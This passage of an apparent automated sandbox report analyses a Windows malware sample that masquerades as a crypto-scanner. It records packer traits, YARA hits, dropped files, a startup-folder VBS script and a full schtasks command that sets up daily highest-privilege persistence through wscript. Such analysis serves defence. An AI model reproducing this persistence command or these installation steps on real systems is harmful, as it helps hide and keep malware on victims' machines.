                  Source: Binary string: \??\C:\Windows\mscorlib.pdb"x source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 0000001D.00000002.3381994918.00000000016BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381670548.0000000001338000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 0000001D.00000002.3381994918.0000000001636000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb- source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb% source: InstallUtil.exe, 0000001D.00000002.3393491251.0000000005B30000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, R7pp1CEv5h7lSYql4h.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  .NET source code contains potential unpacker
                  Source: 00000123.exe, -.cs.Net Code: _E001
                  Source: 00000123.exe, -.cs.Net Code: _E013
                  Source: 00000123.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 00000123.exe, Qlvbgtnnqlr.cs.Net Code: Ymkcbcetoao System.AppDomain.Load(byte[])
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.00000123.exe.1c50000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 37.2.MSBuild.exe.5a10000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.00000123.exe.8160000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.00000123.exe.8160000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2569244195.0000000008160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000002.2849642219.0000000005A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 00000123.exe PID: 7248, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1396, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7400, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_004062FC
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A1B9 push esp; retn 0001h0_2_01C4A1BA
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4815B push edi; ret 0_2_01C4815E
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A169 push edx; retn 0001h0_2_01C4A16A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A5C0 push ebp; retn 0001h0_2_01C4A5C2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A529 push ebp; retn 0001h0_2_01C4A52A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C424D9 push es; retn 0001h0_2_01C424DA
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C43478 push cs; retn 0001h0_2_01C4347A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4B478 pushad ; retn 0001h0_2_01C4B47A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A7D1 push edi; retn 0001h0_2_01C4A7D2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A789 push edi; retn 0001h0_2_01C4A78A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A738 push esi; retn 0001h0_2_01C4A73A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A6A1 push esi; retn 0001h0_2_01C4A6A2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4A658 push esi; retn 0001h0_2_01C4A65A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA9155 push ds; retf 0_2_01CA9156
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA73D0 push esp; ret 0_2_01CA73D2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA73F8 push esp; ret 0_2_01CA73FA
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7397 push esp; ret 0_2_01CA739A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA73A1 push esp; ret 0_2_01CA73A2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7379 push esp; ret 0_2_01CA737A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7370 push esp; ret 0_2_01CA7372
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7301 push esp; ret 0_2_01CA7302
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CAB29F push es; ret 0_2_01CAB2BF
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CAE260 push ds; retf 0_2_01CAE26E
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA75A8 push esi; ret 0_2_01CA75AA
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA75A1 push edi; ret 0_2_01CA75A2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7561 push esi; ret 0_2_01CA7562
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA94AC push ds; retf 0_2_01CA94AE
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA74BF push ebp; ret 0_2_01CA74C2
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7429 push ebp; ret 0_2_01CA742A
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA7431 push ebp; ret 0_2_01CA7432
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CAE7D4 pushfd ; ret 0_2_01CAE992
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, NX3oNh2jjguTqMC0C4e.csHigh entropy of concatenated method names: 'BmC2KpjYR4', 'hqt2CXO0eC', 'sMi2GjGrI1', 'iuV2oEyR3D', 'cA92I1TUsv', 'eGo2v3rsSe', 'lay28Mfabm', 'eTX2pEPo64', 'WjW2Wod7Jm', 'KGd2HE1rLo'
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, R7pp1CEv5h7lSYql4h.csHigh entropy of concatenated method names: 'H0Iqq534L24Kv13NonE', 'sKF2fv3hQI8kgvu71Ky', 'RPf22qP4OG', 'vh0ry9Sq2v', 'Eyq2sPFYYw', 'lqO24gUOMk', 'l9j2hHC2HH', 'g6E2FQUw29', 'icuxOHIjhQ', 'qCnfGOfOL'

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\611485\Heroes.comJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comFile created: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comJump to dropped file
                  Uses ipconfig to lookup or modify the Windows network settings
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Users\user\Desktop\00000123.exeFile created: C:\Users\user\AppData\Local\Temp\update.exeJump to dropped file
                  Source: C:\Users\user\Desktop\00000123.exeFile created: C:\Users\user\AppData\Roaming\updatte.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\611485\Heroes.comJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comFile created: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\Desktop\00000123.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbsJump to dropped file
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Persian" /tr "wscript //B 'C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                  Source: C:\Users\user\Desktop\00000123.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbsJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007B26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,28_2_007B26DD
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0073FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,28_2_0073FC7C
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
